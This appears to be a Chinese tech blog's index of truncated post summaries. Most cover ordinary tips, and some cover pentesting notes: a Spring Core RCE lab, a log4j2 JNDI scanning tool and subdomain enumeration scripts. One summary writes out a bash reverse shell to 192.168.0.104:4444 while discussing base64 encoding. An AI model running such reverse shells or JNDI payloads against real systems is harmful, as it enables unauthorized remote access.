摘要:
终端下执行: defaults write com.google.Chrome SuppressUnsupportedOSWarning -bool true 阅读全文
摘要:
Exception in callback _ProactorBasePipeTransport._call_connection_lost(None) handle: <Handle _ProactorBasePipeTransport._call_connection_lost(None)> T 阅读全文
摘要:
find ./ * | xargs -I {} sed -i "s/10-13/09-27/g" {} 阅读全文
摘要:
开机状态,用数据线连接电脑,可以打开i4助手方便后面查看是否进入dfu模式。 按住关机键2秒,然后同时按住关机键和Home键8-10秒;最后,只要按住Home键15秒。 看到黑屏状态后 基本就是进入了,此时查看i4助手即可 阅读全文
摘要:
需要在windows下 pip install pyinstaller==3.2.1 #(win7 python2.7) pyinstaller -Fw 1.py # 如果要打包icon pyinstaller -Fw -i xx.ico 1.py https://blog.csdn.net/m0_ 阅读全文
摘要:
layui表格不渲染的问题 我的情况是django返回json数据给前台模板渲染,然后遇到了模板不渲染的问题。 点1 ,django返回数据时使用json.dumps(t)}装载 点2, 关闭f12,实测开启f12时候页面不渲染,关闭f12时候即可渲染 阅读全文
摘要:
hw快结束时候要求给领导展示个倒计时,就手写了个,虽然最后也么有用上哈哈哈 # https://www.jianshu.com/p/0b5dfd0f6fd7 from tkinter import * from datetime import datetime class TestTime(obje 阅读全文
摘要:
解决git push输入账号密码报错的问题 https://mycyberuniverse.com/how-fix-fatal-authentication-failed-for-https-github-com.html 阅读全文
摘要:
偶然机会看到idea里打开文件时有显示\wsl$\kali-linux,突然意识到可以使用smb去访问子系统的文件夹 那么: 长见识了 阅读全文
摘要:
<plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> <version>2.2.6.RELEASE</version> <executions> < 阅读全文
摘要:
1 使用docker下载docker pull vulfocus/spring-core-rce-2022-03-29 2 运行靶机容器 docker run -d -p 8080:8080 vulfocus/spring-core-rce-2022-03-29:latest 3 访问http:// 阅读全文
摘要:
log4j2-scan 工具简介 log4j2-scan是一款利用浏览器爬虫爬取网站所有链接,并替换参数值为jndi形式,旨在遍历所有链接发现log4j2漏洞的工具。 工作流程 程序的工作流是利用rad爬取网站所有链接 自动适配操作系统下载rad程序 替换值为log4j2漏洞的payload 更改请 阅读全文
摘要:
import requests from bs4 import BeautifulSoup import sys import os class Rapiddns: def __init__(self, domain): self.domain = domain self.data = [] def 阅读全文
摘要:
google api获取及使用 1 生成KEY 访问该地址:https://developers.google.com/custom-search/v1/overview?hl=en_US点击“Get a KEY”,此处需要登录谷歌账号,以及注册谷歌云账号并创建一个project。 2 这个key可 阅读全文
摘要:
import requests import time import os import sys class Alienvault: def __init__(self, domain): self.domain = domain def run(self): base = 'https://otx 阅读全文
摘要:
import requests import time import os import sys class FullHunt: def __init__(self, domain): self.domain = domain def run(self): url = f'https://fullh 阅读全文
摘要:
从oneforall摘出来的,做调整的话只需修改最下部的bing类即可 import requests import time import random import re import os def check_response(method, resp): """ 检查响应 输出非正常响应返回 阅读全文
摘要:
bash -i >& /dev/tcp/192.168.0.104/4444 0>&1这种带尖括号的在第三方网站进行base64编码的结果与linux终端里base64编码不一致。从而导致执行失败。 正确做法是以linux终端的为准 站长之家的编码: linux终端编码: 阅读全文
摘要:
import os import csv data = [] path = '/Users/apple/36/OneForAll-master/results/csv' dirs = os.listdir(path) for name in dirs: with open(os.path.join( 阅读全文
摘要:
参考来源:https://www.cnblogs.com/LiuDanK/articles/15638323.html 阅读全文